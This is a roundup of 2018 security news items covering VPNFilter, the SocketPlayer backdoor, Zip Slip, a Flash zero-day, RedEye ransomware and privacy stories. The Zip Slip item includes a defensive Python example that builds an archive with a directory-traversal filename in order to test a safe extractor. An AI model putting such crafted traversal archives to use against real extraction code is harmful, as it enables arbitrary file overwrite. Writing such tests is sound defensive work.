This is not the view of David Flint, senior partner at MacRoberts LLP. Asked if researchers should be concerned about GDPR, he told SecurityWeek, "The short answer is YES! Under the GDPR/DPA 2018 the researcher couldn't be a Processor (as he is not acting on instructions of a Controller) therefore he must be a Controller."

So, as a controller, "If a researcher comes across that data he should advise all the Data Subjects that he has the data and what he intends to do with it, sending them a Privacy Notice. (article 14). Article 89 GDPR deals with an exemption for historical research which doesn't seem relevant here."

These are interesting times. MyHeritage users will need to wait to see whether their DNA has been or may be compromised; researchers will need to wait to see whether GDPR may be enforced against them; and businesses around the world – including MyHeritage – will be waiting to see how forcefully GDPR will be enforced by the European Union.


In a new blog posted Wednesday, MyHeritage has announced that it will be retiring all existing MyHeritage passwords. "To maximize the security of our users, we have started the process of expiring ALL user passwords on MyHeritage," writes CISO Omer Deutsch. "This process will take place over the next few days. It will include all 92.3 million affected user accounts plus all 4 million additional accounts that have signed up to MyHeritage after the breach date of October 26, 2017. As of now, we’ve already expired the passwords of more than half of the user accounts on MyHeritage. Users whose passwords were expired are forced to set a new password and will not be able to access their account and data on MyHeritage until they complete this."

ALTR Emerges From Stealth With Blockchain-Based Data Security Solution
7.6.2018 securityweek Security

Austin, Texas-based ALTR emerged from stealth mode on Wednesday with a blockchain-based data security platform and $15 million in funding.

ALTR announced the immediate availability of its product, which has been in development for nearly four years while the company operated in stealth mode.

Originally designed to serve as the public transactions ledger for the Bitcoin cryptocurrency, blockchain is a distributed database consisting of blocks that are linked and secured using cryptography. Companies have been increasingly using blockchain for purposes other than cryptocurrency transactions, including for identity verification and securing data and devices.

ALTR’s platform uses blockchain technology for secure data access and storage. Built on what the company calls ALTRchain, the solution allows organizations to monitor, access and store highly sensitive information.

ALTR emerges from stealth

The ALTR platform is designed to sit between data and applications, and it can be deployed without making any changes to existing software or hardware infrastructure. It offers support for all major database systems, including from Oracle, Microsoft and others.

The platform has three main components: ALTR Monitor, ALTR Govern, and ALTR Protect. ALTR Monitor provides intelligence on data access activities, creating an audit trail of blockchain-based log files.

ALTR Govern is designed for controlling how users access business applications. Organizations can create and apply rule-based locks and access thresholds in an effort to prevent breaches.

ALTR Protect is designed to protect data at rest. It decentralizes sensitive data and stores it across a private blockchain in an effort to protect it against unauthorized access in case any single node has been compromised.

The company also announced that it has opened access to its proprietary blockchain technology by making available its ChainAPI, which allows developers to add ALTRchain to their applications.

ALTR has raised $15 million in funding from private and institutional sources in the cybersecurity, financial services and IT sectors. The money will be used to extend the reach of the company’s platform and launch additional products based on ALTRchain.

ALTR told SecurityWeek that its platform has already been deployed at a healthcare organization, a mid-sized service provider that caters to both Fortune 1000 companies and government agencies, and a couple of firms in the financial services sector.

VPNFilter Targets More Devices Than Initially Thought
7.6.2018 securityweek

Researchers continue to analyze the VPNFilter attack and they have discovered new capabilities and determined that the threat targets a larger number of devices than initially believed.

Cisco Talos’ initial report on VPNFilter said the threat targeted 16 routers and network-attached storage (NAS) devices from Linksys, MikroTik, Netgear, TP-Link and QNAP. It turns out that not only is the malware capable of hacking more device models from these vendors, it can also take control of products from ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE.

Talos now lists a total of more than 50 impacted devices. While researchers have identified a sample targeting UPVEL products, they have not been able to determine exactly which models are affected.

Experts have also found a new stage 3 endpoint exploitation module that injects malicious content into traffic as it passes through a compromised network device.

The new module, dubbed “ssler,” provides data exfiltration and JavaScript injection capabilities by intercepting traffic going to port 80. Attackers can control which websites are targeted and where the stolen data is stored.

“With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports,” Talos explained.

Another new stage 3 module discovered after the initial analysis, dubbed “distr,” allows stage 2 modules to remove the malware from a device and then make that device unusable.

One interesting capability of VPNFilter is to monitor the network for communications over the Modbus SCADA protocol. Talos has conducted further analysis of this sniffer and published additional details.

When it was discovered, the VPNFilter botnet had ensnared roughly 500,000 devices across 54 countries. However, experts believe the main target is Ukraine and, along with U.S. authorities, attributed the threat to Russia, specifically the group known as Sofacy, with possible involvement of the actor tracked as Sandworm.

The FBI has managed to disrupt the botnet by seizing one of its domains, but researchers noticed that the attackers have not given up and continue to target routers in Ukraine.

Backdoor Uses Socket.io for Bi-directional Communication
7.6.2018 securityweek

A recently discovered remote access Trojan is using a specialized program library that allows operators to interact with the infected machines directly, without an initial “beacon” message, G Data reports.

Dubbed SocketPlayer, the backdoor stands out because it doesn’t use the typical one-way communication system that most banking Trojans, backdoors, and keyloggers use. Instead, it employs the socket.io library, which enables real-time, bi-directional communication between applications.

Because of this feature, the malware handler no longer has to wait for the infected machine to initiate communication, and the malware operator can contact the compromised computer on their own.

G Data security researchers observed two variants of SocketPlayer in the wild: one acts as a downloader capable of executing arbitrary code from a website, while the other features more complex capabilities, including detection and sandbox evasion mechanisms.

Once it has been installed on a compromised machine, the malware waits for commands from the operator, and can perform a variety of actions, such as sniffing through drives, screenshot recording, fetching and running code, and more.

The researchers also discovered that other functions are also selectable, though they do not appear to have been implemented yet. One of them, for example, appears to have been intended as a keylogger, though no actual keylogging functionality is present in the backdoor.

The observed malware sample was being distributed through an Indian website, but it’s unclear how the backdoor spreads. Regardless of whether the website was used for infection purposes or only as a mirror, the malicious file remained unnoticed on it for a long time.

The first variant of SocketPlayer was first submitted to VirusTotal on March 28, with a second sample submitted on March 31, G Data explains in a technical report (PDF).

The infection routine starts with the downloader checking if it runs in a sandboxed environment. If it doesn’t, it fetches an executable file, decrypts it, and uses the Invoke method to run it in memory.

The invoked program creates a socket connection to the host hxxp://, as well as a registry key to achieve persistence. It also checks if a Process Handler/ folder exists and creates it if it doesn’t. Next, the program creates an autostart key with the value “Handler.”

It also downloads another executable, which in turn downloads SocketPlayer, decrypts it, and runs it in memory.

The security researchers also noticed that the two variants of the backdoor went through a series of changes between samples, such as the use of a new command and control port, new file locations, different information sent in the initial routine, new commands added to the server, and new functionality included in the malware.

Critical Vulnerability Addressed in Popular Code Libraries
7.6.2018 securityweek

A critical and widespread arbitrary file overwrite vulnerability has been addressed in popular libraries of projects from HP, Amazon, Apache, Pivotal, and more.

Dubbed Zip Slip and discovered by Snyk Security, the vulnerability exists when the code that extracts files from an archive doesn’t validate the file paths in the archive.

The security flaw was responsibly disclosed to the impacted parties starting in mid-April and is said to impact thousands of projects. The issue has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go.

According to Snyk Security, Java has been impacted the most, as it lacks a central library for the high level processing of archive files. Because of that, vulnerable code snippets “were being hand crafted and shared among developer communities such as StackOverflow,” the security researchers explain.

Exploitation is possible via a specially crafted archive containing directory traversal filenames. Numerous archive formats are affected by the bug, including tar, jar, war, cpio, apk, rar and 7z.

“Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive,” Snyk Security explains.

The directory traversal vulnerability allows an attacker to access parts of the file system residing outside of their target folder. The attacker can then overwrite executable files and achieve remote command execution on the victim’s machine when these files are executed. The flaw can also be abused to overwrite configuration files or other sensitive resources.

“The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking,” the researchers explain.

First, the archive should contain one or more files designed to break out of the target directory when extracted. The contents of the archive need to be hand crafted, as archive creation tools “don’t typically allow users to add files with these paths,” Snyk Security notes. Armed with the right tools, however, an attacker can easily create files with these paths.

Second, the archive has to be extracted by the victim, either using a vulnerable library or the victim's own extraction code.

“You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation,” the researchers say.
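As an added illustration (not Snyk's code or that of any affected project), the Python block below shows the missing check the researchers describe: a pre-extraction scan that flags entries whose resolved path leaves the target directory, and a hand-rolled extractor that refuses such archives before writing anything. The sample archive, including its "../" entry, is constructed in memory.

```python
import io
import os
import tempfile
import zipfile
from typing import List


def build_demo_archive(include_slip: bool = True) -> bytes:
    """Constructed sample archive (not from Snyk or any affected project).

    It holds one benign entry and, optionally, one entry whose name climbs
    out of the extraction directory. Ordinary archive tools refuse such names,
    but zipfile.ZipInfo stores the name verbatim, so writestr() is enough to
    reproduce the malicious layout in memory for testing an extractor.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", b"benign content\n")
        if include_slip:
            zf.writestr("../escaped.txt", b"would land outside the target dir\n")
    return buf.getvalue()


def is_safe_member(dest_dir: str, member_name: str) -> bool:
    """True only if dest_dir/member_name resolves to a path inside dest_dir.

    This is the directory traversal validation the article says vulnerable
    extractors lack: join, canonicalise, and confirm the result is still
    under the target directory. Both '..' segments and absolute names fail.
    """
    base = os.path.realpath(dest_dir)
    target = os.path.realpath(os.path.join(base, member_name))
    try:
        return os.path.commonpath([base, target]) == base
    except ValueError:  # different drives on Windows: definitely outside
        return False


def find_traversal_entries(archive: bytes, dest_dir: str) -> List[str]:
    """Pre-extraction scan: return every entry name that would escape dest_dir."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return [n for n in zf.namelist() if not is_safe_member(dest_dir, n)]


def safe_extract(archive: bytes, dest_dir: str) -> List[str]:
    """Hand-rolled extraction with the check applied before any file is written.

    Validating every name first (rather than per entry while writing) means a
    malicious archive leaves no partial output behind. Returns the entry names
    written, in archive order.
    """
    bad = find_traversal_entries(archive, dest_dir)
    if bad:
        raise ValueError(f"refusing archive: traversal entries {bad}")
    written = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            out_path = os.path.join(dest_dir, info.filename)
            if info.is_dir():
                os.makedirs(out_path, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(out_path), exist_ok=True)
            with zf.open(info) as src, open(out_path, "wb") as dst:
                dst.write(src.read())
            written.append(info.filename)
    return written


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        dest = os.path.join(tmp, "out")
        print("offending entries:", find_traversal_entries(build_demo_archive(), dest))
        try:
            safe_extract(build_demo_archive(), dest)
        except ValueError as exc:
            print("blocked:", exc)
        print("clean archive wrote:", safe_extract(build_demo_archive(False), dest))
```

The same realpath-and-prefix check applies to tar, jar, war and the other formats the article lists; only the library used to read the entry names changes.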

In a GitHub repository, Snyk published a list of impacted libraries, which includes npm (language JavaScript), Java (language Java), .NET (languages: .NET and Go), Ruby gem (language Ruby), Go (language Go), Oracle (language Java), and Apache (language Java).

“Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarCube, OpenTable, Arduino, ElasticSearch, Selenium, Gradle, JetBrains and Google,” the researchers note.

Snyk also notes that some projects were patched despite being confirmed not vulnerable, while others that continue to use the vulnerable code implementation are said to be not exploitable. Specifically, “it is believed that it would not be possible to attack these projects in such a way that could lead to a malicious outcome,” the researchers say.

Facebook Deals With Chinese Firm Draw Ire From U.S. Lawmakers
7.6.2018 securityweek

Facebook drew fresh criticism from US lawmakers following revelations that it allowed Chinese smartphone makers, including one deemed a national security threat, access to user data.

The world's largest social network confirmed late Tuesday that China-based Huawei -- which has been banned by the US military and is a lightning rod for cyberespionage concerns -- was among the device makers authorized to see user data.

Facebook has claimed the agreements with some 60 device makers dating from a decade ago were designed to help the social media giant get more services into the mobile ecosystem.

Nonetheless, lawmakers expressed outrage that Chinese firms were given access to user data at a time when officials were trying to block their access to the US market over national security concerns.

Senator Ed Markey said Facebook's chief executive has some more explaining to do following these revelations.

"Mark Zuckerberg needs to return to Congress and testify why @facebook shared Americans' private information with questionable Chinese companies," the Massachusetts Democrat said on Twitter.

"Our privacy and national security cannot be the cost of doing business."

Other lawmakers zeroed in on the concerns about Huawei's ties to the Chinese government, even though the company has denied the allegations.

"This could be a very big problem," tweeted Senator Marco Rubio, a Florida Republican.

"If @Facebook granted Huawei special access to social data of Americans this might as well have given it directly to the government of #China."

Representative Debbie Dingell called the latest news on Huawei "outrageous" and urged a new congressional probe.

"Why does Huawei, a company that our intelligence community said is a national security threat, have access to our personal information?" said Dingell, a Michigan Democrat, on Twitter.

"With over 184 million daily Facebook users in US & Canada, the potential impact on our privacy & national security is huge."

'Approved experiences'

Facebook, which has been blocked in China since 2009, also had data-access deals with Chinese companies Lenovo, OPPO and TCL, according to the company, which had similar arrangements with dozens of other device makers.

Huawei, which has claimed national security fears are unfounded, said in an emailed statement its access was the same as other device makers.

"Like all leading smartphone providers, Huawei worked with Facebook to make Facebook's service more convenient for users. Huawei has never collected or stored any Facebook user data."

The revelations come weeks after Zuckerberg was grilled in Congress about the hijacking of personal data on some 87 million Facebook users by Cambridge Analytica, a consultancy working on Donald Trump's 2016 campaign.

Facebook said its contracts with phone makers placed tight limits on what could be done with data, and that "approved experiences" were reviewed by engineers and managers before being deployed.

Any data obtained by Huawei "was stored on the device, not on Huawei's servers," according to Facebook mobile partnerships chief Francisco Varela.

Facebook said it does not know of any privacy abuse by cellphone makers who years ago were able to gain access to personal data on users and their friends.

It has argued the data-sharing with smartphone makers was different from the leak of data to Cambridge Analytica, which obtained private user data from a personality quiz designed by an academic researcher who violated Facebook's rules.

Facebook is winding up the interface arrangements with device makers as the company's smartphone apps now dominate the service. The integration partnership with Huawei will terminate by the end of this week, according to the social network.

The news comes following US sanctions on another Chinese smartphone maker, ZTE -- which was not on the Facebook list -- for violating export restrictions to Iran.

The ZTE sanctions limiting access to US components could bankrupt the manufacturer, but Trump has said he is willing to help rescue the firm, despite objections from US lawmakers.

AXA Partners With SecurityScorecard to Set Cyber Insurance Premiums
7.6.2018 securityweek Cyber

AXA Will Use Ratings From SecurityScorecard to Help Set Premiums for Insurance Agreements

Cyber insurance is a problem. It is a new industry with huge potential but great difficulties. Getting premiums right is an example -- the cyber insurer needs to fully understand the financial risk it incurs in order to set premiums high enough to cover the risk and still make a profit, but low enough not to kill the market.

Steve Durbin, managing director of the Information Security Forum, describes the problem. "We have already seen that the financial impact of some information security risks is being transferred through cyber insurance," he told SecurityWeek.

"However, moving forward, I anticipate that several large data breaches will expose aggregated risks and cause insurers to suffer significant financial losses. As a result of this mispricing debacle, several insurers will be forced out of business while others will raise premiums significantly, expand contract exclusions and restrictions, or avoid cyber insurance altogether. This will make cyber insurance no longer financially viable for many organizations, and the market will contract and take several years to recover."

Quite simply, data breaches are happening with increasing frequency (another 92 million passwords exposed by MyHeritage this week). At the same time, the cost of recovery continues to escalate rapidly, and the quantity and severity of cyber regulations, such as GDPR, is expanding.

The insurance industry traditionally relies on actuarial tables -- effectively a database of experience -- to set its premiums. While insurance companies are currently busy compiling such data on historical breaches, they have nothing like the depth of, for example, motor insurance actuarial tables.

"Currently, most policy premiums are based on self-assessments," comments Greg Reber, CEO at consulting firm AsTech. This leads to its own problems. False assessments, even unintentional errors, could lead to reduced payouts in extremis. It is a strange irony that the best premiums will only be obtainable by the organizations that least need to transfer their risk to the insurance industry. At the same time, any companies that seek to rely on insurance alone to handle their risk are likely to come unstuck.

SecurityScorecard and AXA (the world's largest insurance company) believe they have found a solution to the premium problem. SecurityScorecard is a firm that rates the cybersecurity posture of web-enabled firms. It does not wait to be asked -- and the result is a growing database of independent security ratings on the world's web-enabled businesses. Currently, it continuously monitors more than 200,000 businesses and gives them a security score from A to F. Empirical evidence suggests it works: "Companies that rate as a D or F are 5.4 times more likely to be breached than companies that rate as an A or a B," claims the company.

AXA has now entered an agreement with SecurityScorecard to have access to these ratings, and will use them to help set the premium for its insurance agreements. "The SecurityScorecard platform," explains Scott Sayce, global chief underwriting officer of cyber at AXA, "will help us rapidly evaluate companies to understand their cyberhealth and provide our underwriters with crucial information needed to evaluate an insured's risk.”

"AXA and SecurityScorecard are pioneering the cyber insurance industry,” adds Aleksandr Yampolskiy, CEO and co-founder at SecurityScorecard. "This partnership demonstrates the value of the SecurityScorecard platform and the trust top business leaders have in our score. Our vision is to create a ubiquitous language for cybersecurity that facilitates collaboration and communication between business partners.”

Rather than relying on subjective, manual self-assessments from the customer, "They're going to be using the objective, automated, security metrics that we provide to make their insurance decisions," Yampolskiy told SecurityWeek. "They will feed that data into their algorithms and then decide, do I increase the premium because the customer's security posture looks risky, do I lower the premium, or maybe in some cases do I just flat out refuse to provide the cyber insurance?"

Our data, he continued, provides "objective measurements to create the scientific basis for making those insurance decisions. AXA plans to start underwriting thousands and thousands of European businesses." It is the small to medium-sized business that most needs cyber insurance. "If you're an Equifax or a Target and you get hacked," continued Yampolskiy, "you might survive. But if you're a small company, you will not. So, AXA is planning to start using our technology to start making those cyber insurance policies that apply to thousands of those businesses." The advantage for those small businesses is that their premiums can be set realistically, and they will also learn their SecurityScorecard rating. "And that provides a lot of reciprocal benefit," he added.

Will this relationship be enough to kickstart a serious cyber insurance industry? It will probably happen anyway, but it may take time if left to its own devices. SecurityWeek asked Yampolskiy if cyber insurance might join the ranks of other insurances that are required by law.

"My belief is, yes," said Yampolskiy, "at some point in the future. We've reached the point where all companies are part of a larger interconnected ecosystem." He raised the example of Target, a large company breached through a small member of its supply chain. Target lost millions of dollars because of a smaller company that could not, from its own resources, have provided recompense. "It's hard to predict the future," he said, "but I can see a time when all companies are required to have cyber insurance."

By providing a scientific basis for the insurance industry to use for premium-setting, Yampolskiy believes SecurityScorecard and AXA are moving the market toward the time when cyber insurance is not merely standard, but possibly required.

SecurityScorecard is based in New York. It was founded in 2013, and raised $12.5 million in Series A funding led by Sequoia Capital in 2015; $20 million in Series B in 2016; and $27.5 million in Series C in 2017. Its stated mission is "to empower every organization with collaborative security intelligence."

Group That Caused Power Outage Stops Focusing Exclusively on Ukraine
7.6.2018 securityweek ICS

Electrum, the Russia-linked hacker group believed to be responsible for the 2016 power outage in Ukraine, no longer focuses exclusively on this country, according to industrial cybersecurity firm Dragos.

Electrum is said to have used Crashoverride/Industroyer, a piece of malware designed to target industrial control systems (ICS), to cause the power outage in December 2016. Researchers have also found links to Sandworm (aka TeleBots and BlackEnergy), which has been blamed for the 2015 power outage that hit Ukraine. Sandworm is also believed to have played a role in the ongoing VPNFilter campaign.

According to Dragos, Electrum initially focused on development and facilitating Sandworm attacks. However, starting with the Crashoverride attack, it took on operational tasks as well.

The group is still active and, since last year, has been seen focusing on organizations outside Ukraine. While Dragos is unable to disclose which regions have been targeted, the company tells SecurityWeek that the hackers have launched attacks on organizations in the water and electric sectors.

The security firm has been monitoring Electrum, and earlier this year it came across new information on the threat actor’s infiltration techniques and on the capabilities of the Crashoverride malware. Researchers say the group relies on common attack methods rather than zero-day vulnerabilities and exploits.

“For instance, the group used Microsoft SQL database servers as the gateway that bridges both the business and industrial control networks, to successfully compromise industrial control systems where they used stolen credentials to execute code,” explained Sergio Caltagirone, director of threat intelligence at Dragos.

The company told SecurityWeek it had not identified any new deployment of the Crashoverride malware. “Crashoverride was a very specific framework for electric grid attacks. We would only expect to see this immediately prior to an ICS impact,” it said.

“The group’s ongoing activity and link to the Sandworm team indicate Electrum’s sponsor could direct ICS disruption operations to other geographic areas,” Caltagirone noted. “Dragos considers Electrum to be one of the most competent and sophisticated threat actors currently in the ICS industry.”

Dragos has published brief reports on several of the groups that pose a threat to ICS, including Iran-linked Chrysene, Russia-linked Allanite, and Xenotime, the group believed to be behind the Triton/Trisis attacks.

Last week, it reported that a threat actor linked to North Korea’s Lazarus Group had stopped targeting organizations in the United States.

Adobe Patches Flash Zero-Day Exploited in Targeted Attacks
7.6.2018 securityweek

[Updated] Security updates released by Adobe on Thursday for Flash Player patch four vulnerabilities, including a critical flaw that has been exploited in targeted attacks.

The vulnerability that has been exploited in the wild is tracked as CVE-2018-5002, and it has been described by Adobe as a stack-based buffer overflow that can be leveraged for arbitrary code execution.

The security hole was independently reported to Adobe by researchers at ICEBRG, Qihoo 360 and Tencent.

The researchers have yet to share any details, but Adobe did mention that CVE-2018-5002 has been exploited in limited, targeted attacks against Windows users. Hackers deliver the exploit via malicious Office documents that include specially crafted Flash content. The documents are distributed via email.

The latest version of Flash Player also patches a critical type confusion vulnerability that can lead to code execution (CVE-2018-4945), an “important” severity integer overflow that can result in information disclosure (CVE-2018-5000), and an “important” out-of-bounds read issue that can also lead to information disclosure (CVE-2018-5001).

CVE-2018-5000 and CVE-2018-5001 were reported anonymously through Trend Micro’s Zero Day Initiative (ZDI), while CVE-2018-4945 was reported to Adobe by researchers at Tencent.

Despite Adobe’s plans to kill Flash Player by 2020, threat actors apparently still find zero-day vulnerabilities highly useful.

This is the second zero-day discovered in 2018. The first was patched in February after North Korean hackers exploited it for several months in attacks aimed at South Korea.

UPDATE. According to the Advanced Threat Response Team at 360 Core Security, which discovered the Flash exploit on June 1, attacks involving CVE-2018-5002 appear to be mainly aimed at entities in the Middle East.

The exploit has been delivered using a specially crafted Excel spreadsheet named “salary.xlsx,” which includes salary information written in Arabic. A malicious SWF file that contains the zero-day exploit is downloaded from a remote server once the spreadsheet is opened. Researchers say the goal is to download a Trojan, but they have not provided any information on the malware.

Data collected from the command and control (C&C) server suggests that hackers have been making preparations for the attack since February. The C&C domain is designed to mimic a job search website in the Middle East and its name suggests that the target is located in Doha, Qatar.

360 Core Security has published technical details on CVE-2018-5002, which makes it easier for other threat groups to start exploiting the flaw.

UPDATE 2. ICEBRG’s Security Research Team (SRT) has also published a blog post detailing the attack and the Flash Player vulnerability.

Data Classification Firm DocAuthority Raises $10 Million
7.6.2018 securityweek IT

Israeli startup firm DocAuthority has raised $10 million in a Series A funding round led by Raine Ventures, with the participation of Greycroft, ffVC, Differential VC in the US, and 2B Angels and Plus Ventures in Israel. The funding will be used to accelerate growth and market reach.

DocAuthority brings artificial intelligence to the classification problem for unstructured data. Security and compliance require that company secrets, intellectual property and personal information be adequately secured; but business efficiency requires ready access to and use of non-confidential data. This requires accurate document classification, specifying what level of security control should be applied to different documents.

This data classification is traditionally performed manually. If applied retrospectively to an existing document store it can take many months, and is subject to both false positives and false negatives in the application of classification labels. If done in real time, individuals frequently tend to over-classify -- to assume a particular document is more sensitive than it actually is.

The result is often both an unnecessary burden on staff efficiency (through over-classification), and a failure to adequately protect instances of personal data (through under-classification). The need to locate and protect all instances of PII is increasingly important with the rapid growth of severe personal privacy legislation, such as GDPR.

DocAuthority's AI-based platform will scan documents and apply classification without human error, and at machine rather than human speed. "DocAuthority's revolutionary BusinessID technology," claims cofounder and CTO Ariel Peled, "is a new branch in data science, offering a novel take on AI that solves a major problem in data management and protection. With full automation and an accuracy level of 1:10,000, both business and security can agree and safely rely on policies for data classification, access management, DLP, encryption and as importantly, retention."

The funding "is an important milestone for DocAuthority," commented CEO Steve Abbott. "DocAuthority enables organizations to manage data based on both risk profile and business value, offering a common language across an organization. Assigning data management policies, based on business category, easily aligns security controls with business usage of data."

DocAuthority was founded in 2013 by Ariel Peled (CTO) and Itay Reved (VP R&D). It is based in Ra'anana, HaMerkaz, in central Israel.

'RedEye' Ransomware Destroys Files, Rewrites MBR
7.6.2018 securityweek

A newly discovered piece of ransomware appears mainly created to destroy the victim’s files instead of encrypting and holding them for ransom.

Dubbed RedEye, the malware appears to be the creation of the developer behind the Annabelle ransomware, who also claims to have made the JigSaw ransomware that first emerged a couple of years back (Cisco says the individual might be responsible for several other families as well).

Like Annabelle and JigSaw, RedEye stands out in the crowd for its destructive nature. While the vast majority of ransomware families out there have been created with the purpose of generating revenue for their authors and operators, RedEye would gladly destroy users’ files even if there’s no financial gain in it.

The new threat, discovered by Bart Blaze, has a large file size of 35.0 MB. This is the result of several media files (images and audio) being embedded in the binary; among them are three .wav files (child.wav, redeye.wav, and suicide.wav) that play creepy sounds intended to scare the victim.

The malware author also used ConfuserEx and compression, along with a few other tricks, to protect the binary. A second binary was also embedded in the file, capable of replacing the MBR (Master Boot Record).

Once it has infected a computer, the ransomware performs a series of actions to make removal a difficult process. The threat disables task manager and also hides the victim machine’s drives.

RedEye then displays a ransom note informing victims that their files have been encrypted using AES256 and that they should access an .onion website and pay 0.1 Bitcoins to a specified address. This would supposedly result in a decryption key being delivered to them.

The victim is required to pay the ransom in 4 days, and the malware claims to be able to “fully destroy” the computer after that period of time is over.

Options available in the ransomware include the possibility to view encrypted files and decrypt them, get support, and “destroy PC.”

If the last option is selected, a GIF is displayed in the background, with an option to proceed with the operation (a "Do it" button) and another to close the image. If “Do it” is selected, the same as when the 4-day window is over, the malware reboots the machine and replaces the MBR.

Thus, when the victim powers on the system, they are greeted with a message informing them that “RedEye terminated their computer.” The malware author signed the message with the “iCoreX” handle.

Blaze also notes that, despite claiming to have securely encrypted files with AES256, RedEye appears to actually “overwrite or fill files with 0 bytes,” thus rendering them useless. The malware also appends the .RedEye extension to the affected files.

“While it appears that the RedEye ransomware has even more tricks up its sleeve than its predecessor Annabelle, the same conclusion holds true: do not pay the ransomware. As for the actual purpose of the ransomware: it may be considered a ransomware of the wiper kind, however, it appears the author likes to showcase his or her skill,” Blaze concludes.

FBI seizes control of a massive botnet that infected over 500,000 routers
7.6.2018 thehackernews  BotNet

Shortly after Cisco released its early report on a large-scale hacking campaign that infected over half a million routers and network storage devices worldwide, the United States government announced the takedown of a key internet domain used for the attack.
Yesterday we reported on a piece of highly sophisticated IoT botnet malware that has infected over 500,000 devices in 54 countries and was likely designed by a Russia-backed state-sponsored group, possibly in an effort to cause havoc in Ukraine, according to an early report published by Cisco's Talos cyber intelligence unit on Wednesday.
Dubbed VPNFilter by the Talos researchers, the malware is a multi-stage, modular platform that targets small office/home office (SOHO) routers from Linksys, MikroTik, NETGEAR, and TP-Link, as well as network-attached storage (NAS) devices.

Meanwhile, the court documents unsealed in Pittsburgh on the same day indicate that the FBI has seized a key web domain communicating with a massive global botnet of hundreds of thousands of infected SOHO routers and other NAS devices.
The court documents said the hacking group behind the massive malware campaign is Fancy Bear, a Russian government-aligned hacking group also known as APT28, Sofacy, X-agent, Sednit, Sandworm, and Pawn Storm.
The hacking group has been in operation since at least 2007 and has been credited with a long list of attacks over the past years, including the 2016 hack of the Democratic National Committee (DNC) and Clinton Campaign to influence the U.S. presidential election.
"This operation is the first step in the disruption of a botnet that provides the Sofacy actors with an array of capabilities that could be used for a variety of malicious purposes, including intelligence gathering, theft of valuable information, destructive or disruptive attacks, and the misattribution of such activities," John Demers, the Assistant Attorney General for National Security, said in a statement.
Among other things, Talos researchers also found evidence that VPNFilter shares code with versions of BlackEnergy, the malware responsible for multiple large-scale attacks targeting devices in Ukraine that the U.S. government has attributed to Russia.
VPNFilter has been designed in a way that it could be used to secretly conduct surveillance on its targets and gather intelligence, interfere with internet communications, monitor industrial control or SCADA systems, such as those used in electric grids, other infrastructure and factories, as well as conduct destructive cyber attack operations.

The seizure of the domain, which is part of VPNFilter's command-and-control infrastructure, allows the FBI to redirect the callbacks made by stage one of the malware (in its attempt to reinfect the device) to an FBI-controlled server, which will capture the IP addresses of infected devices and pass them on to authorities around the globe who can remove the malware.
Users of SOHO and NAS devices that are infected with VPNFilter are advised to reboot their devices as soon as possible, which eliminates the non-persistent second stage malware, causing the persistent first-stage malware on their infected device to call out for instructions.
"Although devices will remain vulnerable to reinfection with the second stage malware while connected to the Internet, these efforts maximize opportunities to identify and remediate the infection worldwide in the time available before Sofacy actors learn of the vulnerability in their command-and-control infrastructure," the DoJ said.
Since VPNFilter does not exploit any zero-day vulnerability to infect its victims and instead searches for devices still exposed to known vulnerabilities or using default credentials, users are strongly recommended to change the default credentials on their devices to protect against the malware.
Moreover, always put your routers behind a firewall, and turn off remote administration until and unless you really need it.
If your router is by default vulnerable and can't be updated, it is time you buy a new one. You need to be more vigilant about the security of your smart IoT devices.

Here's How to Download All the Data Apple Collects About You
7.6.2018 thehackernews Apple

Apple is making it easier for its users to download the data the company has collected about them so far.
On Wednesday, Apple just launched a new Data and Privacy website that allows you to download everything that the company knows about you, from Apple ID info, device info, App Store activity, AppleCare history, your online shopping habits to all of your data stored in its iCloud.
A similar feature was recently offered by Facebook, enabling its users to download all of their data, not only what they have posted, but also information like facial recognition and location data, following the Cambridge Analytica scandal.
Apple has currently made this feature available only for people with accounts in the European Union (along with Iceland, Liechtenstein, Norway and Switzerland), to comply with the General Data Protection Regulation (GDPR), which goes into effect on May 25.

However, Apple is planning to roll out this feature worldwide in the coming months. "We intend to provide these capabilities to customers around the world in the coming months," the company wrote.
The new GDPR was passed with the aim of completely transforming the way companies handle users' personal data, giving users more control over it. The regulation applies to all companies that collect the data of EU residents, regardless of where they are based.
The GDPR will replace the British Data Protection Act 1998 from 25 May 2018.
The government has also warned businesses that if they fail to make changes in their policies before Friday, they could face fines of up to £17 Million (more than $22 Million), or 4% of their global turnover—whichever amount is higher.
That's why big companies like Apple have decided to inform their European customers about the new privacy policies.
Here's How to Download Your Data:
You can download all your data with a few simple clicks on the privacy portal.
Log in to privacy.apple.com on your Mac, PC, or iPad.
Select the Get started link under the "Obtain a copy of your data" heading in Manage your data.
You can press 'Select All' to download everything or tick the boxes of the data categories you want to download. iCloud data is listed separately, as it may be large and can take a long time to download.
Apple splits the data into chunks ranging from 1 GB up to a maximum of 25 GB, letting you select your preferred maximum file size. Select a size and hit 'Continue.'
Your download is now in progress, and Apple will send you an email when the files are available to download, which can take up to a week. Your downloaded data is then automatically deleted after 2 weeks.

Here's the List of Data that You can Download:
App Store, iTunes Store, iBooks Store and Apple Music activity
Apple ID account and device information
Apple Online Store and Retail Store activity
AppleCare support history, repair requests and more
Game Center activity
iCloud Bookmarks and Reading List
iCloud Calendars and Reminders
iCloud Contacts
iCloud Notes
Maps Report an Issue
Marketing subscriptions, downloads, and other activity
Other data
iCloud Drive files and documents
iCloud Mail
iCloud Photos
Besides the data download feature, Apple is also providing an option to permanently delete all of your data, which has been made available globally starting today. Once you initiate the data delete option, the company can take up to 7 days to approve the request.
But keep in mind: Once deleted, there is no way you can retrieve your data.

Pornhub launches VPNhub – a free and unlimited VPN service
7.6.2018 thehackernews  Safety

